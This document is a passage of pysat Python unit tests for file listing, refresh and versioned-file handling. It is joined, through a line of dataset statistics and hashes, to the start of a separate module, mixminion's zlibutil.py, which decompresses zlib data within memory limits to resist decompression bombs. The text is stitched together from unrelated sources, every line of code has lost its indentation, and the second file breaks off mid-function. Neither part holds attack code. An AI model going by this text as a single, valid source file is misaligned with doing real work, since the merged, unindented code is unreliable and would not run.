pysat.datetime(2008, 1, 1, 5, 0)
check5 = pds.to_datetime(files.index[-1]) == pysat.datetime(2008, 1, 4)
assert(check1 & check2 & check3 & check4 & check5)
def test_year_month_day_hour_minute_second_files_direct_call_to_from_os(self):
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff_{month:02d}_{hour:02d}_{minute:02d}_',
'{second:02d}.pysat_testing_file'))
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2008, 1, 3)
create_files(self.testInst, start, stop, freq='30s',
use_doy=False, root_fname=root_fname)
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=root_fname)
# check overall length
check1 = len(files) == 5761
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[1]) == \
pysat.datetime(2008, 1, 1, 0, 0, 30)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2008, 1, 3)
assert(check1 & check2 & check3 & check4)
def test_year_month_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1MS',
root_fname=''.join(('pysat_testing_junk_{year:04d}_gold_',
'stuff_{month:02d}.pysat_testing_',
'file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'stuff_{month:02d}.',
'pysat_testing_file')))
# check overall length
check1 = len(files) == 24
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[11]) == \
pysat.datetime(2008, 12, 1)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 1)
assert(check1 & check2 & check3 & check4)
def test_instrument_has_no_files(self):
import pysat.instruments.pysat_testing
pysat.instruments.pysat_testing.list_files = list_files
inst = pysat.Instrument(platform='pysat', name='testing',
update_files=True)
re_load(pysat.instruments.pysat_testing)
assert(inst.files.files.empty)
def test_instrument_has_files(self):
import pysat.instruments.pysat_testing
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_'
'stuff_{month:02d}_{hour:02d}_{minute:02d}_'
'{second:02d}.pysat_testing_file'))
# create a bunch of files by year and doy
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=root_fname)
# create the same range of dates
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
pysat.instruments.pysat_testing.list_files = list_files
inst = pysat.Instrument(platform='pysat', name='testing',
update_files=True)
re_load(pysat.instruments.pysat_testing)
assert (np.all(inst.files.files.index == dates))
class TestBasicsNoFileListStorage(TestBasics):
def __init__(self, temporary_file_list=True):
self.temporary_file_list = temporary_file_list
class TestInstrumentWithFiles():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.data_path = pysat.data_dir
# create temporary directory
dir_name = tempfile.mkdtemp()
pysat.utils.set_data_dir(dir_name, store=False)
# create testing directory
create_dir(temporary_file_list=self.temporary_file_list)
# create a test instrument, make sure it is getting files from
# filesystem
re_load(pysat.instruments.pysat_testing)
pysat.instruments.pysat_testing.list_files = list_files
# create a bunch of files by year and doy
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
temporary_file_list=self.temporary_file_list)
self.root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_',
'{day:03d}_stuff_{month:02d}_{hour:02d}_',
'{minute:02d}_{second:02d}.pysat_testing_',
'file'))
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
def teardown(self):
"""Runs after every method to clean up previous testing."""
remove_files(self.testInst)
del self.testInst
re_load(pysat.instruments.pysat_testing)
re_load(pysat.instruments)
# make sure everything about instrument state is restored
# restore original file list, no files
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
pysat.utils.set_data_dir(self.data_path, store=False)
def test_refresh(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 10)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
start = pysat.datetime(2007, 12, 31)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_refresh_on_ignore_empty_files(self):
# setup created empty files - make sure such files can be ignored
self.testInst.files.ignore_empty_files = True
self.testInst.files.refresh()
assert len(self.testInst.files.files) == 0
# create new files with content and make sure they are captured
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname,
content = 'test')
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_instrument_with_ignore_empty_files(self):
"""Make sure new instruments can ignore empty files"""
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list,
ignore_empty_files=True)
assert len(self.testInst.files.files) == 0
# create new files with content and make sure they are captured
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname,
content = 'test')
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_refresh_on_unchanged_files(self):
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_get_new_files_after_refresh(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_multiple_refreshes(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
self.testInst.files.refresh()
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files_and_adding_file(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
start = pysat.datetime(2008, 1, 15)
stop = pysat.datetime(2008, 1, 18)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates2 = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files2 = self.testInst.files.get_new()
assert (np.all(new_files.index == dates) &
np.all(new_files2.index == dates2))
def test_get_new_files_after_deleting_files_and_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
# remove files, same number as will be added
to_be_removed = len(dates)
for the_file in os.listdir(self.testInst.files.data_path):
if (the_file[0:13] == 'pysat_testing') & \
(the_file[-19:] == '.pysat_testing_file'):
file_path = os.path.join(self.testInst.files.data_path,
the_file)
if os.path.isfile(file_path) & (to_be_removed > 0):
# print(file_path)
to_be_removed -= 1
os.unlink(file_path)
# add new files
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_files_non_standard_pysat_directory(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format='pysat_testing_{tag}_{sat_id}',
update_files=True,
temporary_file_list=self.temporary_file_list)
# add new files
create_dir(self.testInst)
remove_files(self.testInst)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format=''.join(('pysat_testing_',
'{tag}_{sat_id}')),
update_files=True,
temporary_file_list=self.temporary_file_list)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(self.testInst.files.files.index == dates) &
np.all(new_files.index == dates))
def test_files_non_standard_file_format_template(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='1D')
# clear out old files, create new ones
remove_files(self.testInst)
create_files(self.testInst, start, stop, freq='1D',
use_doy=False,
root_fname=''.join(('pysat_testing_unique_junk_',
'{year:04d}_gold_{day:03d}_stuff',
'.pysat_testing_file')))
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_',
'junk_{year:04d}_gold_',
'{day:03d}_stuff',
'.pysat_testing_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
assert (np.all(self.testInst.files.files.index == dates))
@raises(ValueError)
def test_files_non_standard_file_format_template_misformatted(self):
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_',
'junk_stuff.pysat_testing',
'_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
@raises(ValueError)
def test_files_non_standard_file_format_template_misformatted_2(self):
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=15,
update_files=True,
temporary_file_list=self.temporary_file_list)
class TestInstrumentWithFilesNoFileListStorage(TestInstrumentWithFiles):
def __init__(self, temporary_file_list=True):
self.temporary_file_list = temporary_file_list
# create year doy file set with multiple versions
def create_versioned_files(inst, start=None, stop=None, freq='1D',
use_doy=True, root_fname=None):
# create a bunch of files
if start is None:
start = pysat.datetime(2009, 1, 1)
if stop is None:
stop = pysat.datetime(2013, 12, 31)
dates = pysat.utils.time.create_date_range(start, stop, freq=freq)
versions = np.array([1, 2])
revisions = np.array([0, 1])
if root_fname is None:
root_fname = ''.join(('pysat_testing_junk_{year:04d}_{month:02d}_',
'{day:03d}{hour:02d}{minute:02d}{second:02d}_',
'stuff_{version:02d}_{revision:03d}.pysat_',
'testing_file'))
# create empty file
for date in dates:
for version in versions:
for revision in revisions:
yr, doy = pysat.utils.time.getyrdoy(date)
if use_doy:
doy = doy
else:
doy = date.day
fname = os.path.join(inst.files.data_path,
root_fname.format(year=yr,
day=doy,
month=date.month,
hour=date.hour,
minute=date.minute,
second=date.second,
version=version,
revision=revision))
with open(fname, 'w') as f:
pass
def list_versioned_files(tag=None, sat_id=None, data_path=None,
format_str=None):
"""Return a Pandas Series of every file for chosen satellite data"""
if format_str is None:
format_str = ''.join(('pysat_testing_junk_{year:04d}_{month:02d}_',
'{day:03d}{hour:02d}{minute:02d}{second:02d}_',
'stuff_{version:02d}_{revision:03d}.pysat_',
'testing_file'))
if tag is not None:
if tag == '':
return pysat.Files.from_os(data_path=data_path,
format_str=format_str)
else:
raise ValueError('Unrecognized tag name')
else:
raise ValueError('A tag name must be passed ')
class TestInstrumentWithVersionedFiles():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.data_path = pysat.data_dir
# create temporary directory
dir_name = tempfile.gettempdir()
pysat.utils.set_data_dir(dir_name, store=False)
# create testing directory
create_dir(temporary_file_list=self.temporary_file_list)
# create a test instrument, make sure it is getting files from
# filesystem
re_load(pysat.instruments.pysat_testing)
pysat.instruments.pysat_testing.list_files = list_versioned_files
# create a bunch of files by year and doy
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
temporary_file_list=self.temporary_file_list)
self.root_fname = ''.join(('pysat_testing_junk_{year:04d}_{month:02d}',
'_{day:03d}{hour:02d}{minute:02d}',
'{second:02d}_stuff_{version:02d}_',
'{revision:03d}.pysat_testing_file'))
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
def teardown(self):
"""Runs after every method to clean up previous testing."""
remove_files(self.testInst)
del self.testInst
re_load(pysat.instruments.pysat_testing)
re_load(pysat.instruments)
# make sure everything about instrument state is restored
# restore original file list, no files
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
pysat.utils.set_data_dir(self.data_path, store=False)
def test_refresh(self):
# create new files and make sure that new files are captured
# files slready exist from 2007, 12, 31 through to 10th
start = pysat.datetime(2008, 1, 10)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
# create list of dates for all files that should be there
start = pysat.datetime(2007, 12, 31)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
# update instrument file list
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_refresh_on_unchanged_files(self):
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_get_new_files_after_refresh(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_multiple_refreshes(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
self.testInst.files.refresh()
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files_and_adding_file(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
start = pysat.datetime(2008, 1, 15)
stop = pysat.datetime(2008, 1, 18)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates2 = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files2 = self.testInst.files.get_new()
assert (np.all(new_files.index == dates) &
np.all(new_files2.index == dates2))
def test_get_new_files_after_deleting_files_and_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
# remove files, same number as will be added
to_be_removed = len(dates)
for the_file in os.listdir(self.testInst.files.data_path):
if (the_file[0:13] == 'pysat_testing') & \
(the_file[-19:] == '.pysat_testing_file'):
file_path = os.path.join(self.testInst.files.data_path,
the_file)
if os.path.isfile(file_path) & (to_be_removed > 0):
to_be_removed -= 1
# Remove all versions of the file
# otherwise, previous versions will look like new files
pattern = '_'.join(file_path.split('_')[0:7]) + \
'*.pysat_testing_file'
map(os.unlink, glob.glob(pattern))
# os.unlink(file_path)
# add new files
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_files_non_standard_pysat_directory(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
pysat.instruments.pysat_testing.list_files = list_versioned_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format='pysat_testing_{tag}_{sat_id}',
update_files=True,
temporary_file_list=self.temporary_file_list)
# add new files
create_dir(self.testInst)
remove_files(self.testInst)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format='pysat_testing_{tag}_{sat_id}',
update_files=True,
temporary_file_list=self.temporary_file_list)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(self.testInst.files.files.index == dates) &
np.all(new_files.index == dates))
def test_files_non_standard_file_format_template(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='1D')
# clear out old files, create new ones
remove_files(self.testInst)
create_versioned_files(self.testInst, start, stop, freq='1D',
use_doy=False,
root_fname=''.join(('pysat_testing_unique_',
'{version:02d}_',
'{revision:03d}_{year:04d}',
'_g_{day:03d}_st.pysat_',
'testing_file')))
pysat.instruments.pysat_testing.list_files = list_versioned_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_',
'{version:02d}_',
'{revision:03d}_{year:04d}_',
'g_{day:03d}_st.pysat_',
'testing_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
assert (np.all(self.testInst.files.files.index == dates))
def test_files_when_duplicates_forced(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='1D')
# clear out old files, create new ones
remove_files(self.testInst)
create_versioned_files(self.testInst, start, stop, freq='1D',
use_doy=False,
root_fname=''.join(('pysat_testing_unique_',
'{version:02d}_',
'{revision:03d}_{year:04d}',
'_g_{day:03d}_st.pysat_',
'testing_file')))
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_??_',
'???_{year:04d}_g_{day:03d}',
'_st.pysat_testing_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
assert (np.all(self.testInst.files.files.index == dates))
class TestInstrumentWithVersionedFilesNoFileListStorage(TestInstrumentWithVersionedFiles):
def __init__(self, temporary_file_list=True):
self.temporary_file_list = temporary_file_list
| 45.922065 | 94 | 0.560534 | 5,218 | 45,371 | 4.642392 | 0.057877 | 0.056473 | 0.049827 | 0.049042 | 0.901998 | 0.88755 | 0.883174 | 0.864267 | 0.856258 | 0.853369 | 0 | 0.041066 | 0.341452 | 45,371 | 987 | 95 | 45.968592 | 0.769671 | 0.099821 | 0 | 0.753053 | 0 | 0.001357 | 0.078279 | 0.046392 | 0 | 0 | 0 | 0 | 0.054274 | 1 | 0.074627 | false | 0.006784 | 0.016282 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6c79575e267e4365e630df9f6320d5d4322dd12f | 14,962 | py | Python | contrib/zlibutil.py | Hasimir/mixminion | 705c4b21d3d43631007821bd73423908a075c689 | [
"MIT"
] | 51 | 2015-02-01T02:09:29.000Z | 2022-02-23T16:07:09.000Z | contrib/zlibutil.py | cybernetics/mixminion | 35b33d945afb89a0a7438219c2e89906e0191e61 | [
"MIT"
] | 1 | 2015-08-23T12:21:09.000Z | 2015-08-23T12:21:09.000Z | contrib/zlibutil.py | cybernetics/mixminion | 35b33d945afb89a0a7438219c2e89906e0191e61 | [
"MIT"
] | 10 | 2015-03-13T12:34:29.000Z | 2022-02-13T07:49:23.000Z | #!/usr/bin/env python
#
# Copyright (c) 2002 Bryce "Zooko" Wilcox-O'Hearn
# portions Copyright (c) 2001 Autonomous Zone Industries
# This file is licensed under the
# GNU Lesser General Public License v2.1.
# See the file COPYING or visit http://www.gnu.org/ for details.
# Python standard library modules
import exceptions, string, types, zlib
# XXXX (I've added this line since we never seem to import hr.) -NM
hr = repr
true = 1
false = 0
class DecompressError(exceptions.StandardError, zlib.error): pass
class UnsafeDecompressError(DecompressError): pass # This means it would take more memory to decompress than we can spare.
class TooBigError(DecompressError): pass # This means the resulting uncompressed text would exceed the maximum allowed length.
class ZlibError(DecompressError): pass # internal error, probably due to the input not being zlib compressed text
def safe_zlib_decompress_to_retval(zbuf, maxlen=(65 * (2**20)), maxmem=(65 * (2**20))):
"""
Decompress zbuf so that it decompresses to <= maxlen bytes, while using <= maxmem memory, or else raise an exception. If `zbuf' contains uncompressed data an exception will be raised.
This function guards against memory allocation attacks.
@param maxlen the resulting text must not be greater than this
@param maxmem the execution of this function must not use more than this amount of memory in bytes; The higher this number is (optimally 1032 * maxlen, or even greater), the faster this function can complete. (Actually I don't fully understand the workings of zlib, so this function might use a *little* more than this memory, but not a lot more.) (Also, this function will raise an exception if the amount of memory required even *approaches* `maxmem'. Another reason to make it large.) (Hence the default value which would seem to be exceedingly large until you realize that it means you can decompress 32 KB chunks of compressiontext at a bite.)
@precondition `maxlen' must be a real maxlen, geez!: ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0: "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
@precondition `maxmem' must be at least 1 MB.: maxmem >= 2 ** 20: "maxmem: %s" % hr(maxmem)
"""
assert ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0, "precondition: `maxlen' must be a real maxlen, geez!" + " -- " + "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
assert maxmem >= 2 ** 20, "precondition: `maxmem' must be at least 1 MB." + " -- " + "maxmem: %s" % hr(maxmem)
lenzbuf = len(zbuf)
offset = 0
decomplen = 0
availmem = maxmem - (76 * 2**10) # zlib can take around 76 KB RAM to do decompression
availmem = availmem / 2 # generating the result string from the intermediate strings will require using the same amount of memory again, briefly. If you care about this kind of thing, then let's rewrite this module in C.
decompstrlist = []
decomp = zlib.decompressobj()
while offset < lenzbuf:
# How much compressedtext can we safely attempt to decompress now without going over `maxmem'? zlib docs say that theoretical maximum for the zlib format would be 1032:1.
lencompbite = availmem / 1032 # XXX TODO: The biggest compression ratio zlib can have for whole files is 1032:1. Unfortunately I don't know if small chunks of compressiontext *within* a file can expand to more than that. I'll assume not... --Zooko 2001-05-12
if lencompbite < 128:
# If we can't safely attempt even a few bytes of compression text, let us give up. Either `maxmem' was too small or this compressiontext is actually a decompression bomb.
raise UnsafeDecompressError, "used up roughly `maxmem' memory. maxmem: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxmem), hr(len(zbuf)), hr(offset), hr(decomplen),)
# I wish the following were a local function like this:
# def proc_decomp_bite(tmpstr, lencompbite=0, decomplen=decomplen, maxlen=maxlen, availmem=availmem, decompstrlist=decompstrlist, offset=offset, zbuf=zbuf):
# ...but until we can depend on Python 2.1 with lexical scoping, we can't update the integers like `offset'. Oh well. --Zooko 2001-05-12
try:
if (offset == 0) and (lencompbite >= lenzbuf):
tmpstr = decomp.decompress(zbuf)
else:
tmpstr = decomp.decompress(zbuf[offset:offset+lencompbite])
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, hr(le), )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
decompstrlist.append(tmpstr)
tmpstr = ''
try:
tmpstr = decomp.flush()
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
if lentmpstr > 0:
decompstrlist.append(tmpstr)
tmpstr = ''
if len(decompstrlist) > 0:
return string.join(decompstrlist, '')
else:
return decompstrlist[0]
def safe_zlib_decompress_to_file(zbuf, fileobj, maxlen=(65 * (2**20)), maxmem=(65 * (2**20))):
"""
Decompress zbuf so that it decompresses to <= maxlen bytes, while using <= maxmem memory, or else raise an exception. If `zbuf' contains uncompressed data an exception will be raised.
This function guards against memory allocation attacks.
Note that this assumes that data written to `fileobj' continues to take up memory.
@param maxlen the resulting text must not be greater than this
@param maxmem the execution of this function must not use more than this amount of memory in bytes; The higher this number is (optimally 1032 * maxlen, or even greater), the faster this function can complete. (Actually I don't fully understand the workings of zlib, so this function might use a *little* more than this memory, but not a lot more.) (Also, this function will raise an exception if the amount of memory required even *approaches* `maxmem'. Another reason to make it large.) (Hence the default value which would seem to be exceedingly large until you realize that it means you can decompress 64 KB chunks of compressiontext at a bite.)
@param fileobj the decompressed text will be written to it
@precondition `fileobj' must be an IO.: fileobj is not None
@precondition `maxlen' must be a real maxlen, geez!: ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0: "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
@precondition `maxmem' must be at least 1 MB.: maxmem >= 2 ** 20: "maxmem: %s" % hr(maxmem)
"""
assert fileobj is not None, "precondition: `fileobj' must be an IO."
assert ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0, "precondition: `maxlen' must be a real maxlen, geez!" + " -- " + "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
assert maxmem >= 2 ** 20, "precondition: `maxmem' must be at least 1 MB." + " -- " + "maxmem: %s" % hr(maxmem)
lenzbuf = len(zbuf)
offset = 0
decomplen = 0
availmem = maxmem - (76 * 2**10) # zlib can take around 76 KB RAM to do decompression
decomp = zlib.decompressobj()
while offset < lenzbuf:
# How much compressedtext can we safely attempt to decompress now without going over `maxmem'? zlib docs say that theoretical maximum for the zlib format would be 1032:1.
lencompbite = availmem / 1032 # XXX TODO: The biggest compression ratio zlib can have for whole files is 1032:1. Unfortunately I don't know if small chunks of compressiontext *within* a file can expand to more than that. I'll assume not... --Zooko 2001-05-12
if lencompbite < 128:
# If we can't safely attempt even a few bytes of compression text, let us give up. Either `maxmem' was too small or this compressiontext is actually a decompression bomb.
raise UnsafeDecompressError, "used up roughly `maxmem' memory. maxmem: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxmem), hr(len(zbuf)), hr(offset), hr(decomplen),)
# I wish the following were a local function like this:
# def proc_decomp_bite(tmpstr, lencompbite=0, decomplen=decomplen, maxlen=maxlen, availmem=availmem, decompstrlist=decompstrlist, offset=offset, zbuf=zbuf):
# ...but until we can use 2.1 lexical scoping we can't update the integers like `offset'. Oh well. --Zooko 2001-05-12
try:
if (offset == 0) and (lencompbite >= lenzbuf):
tmpstr = decomp.decompress(zbuf)
else:
tmpstr = decomp.decompress(zbuf[offset:offset+lencompbite])
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
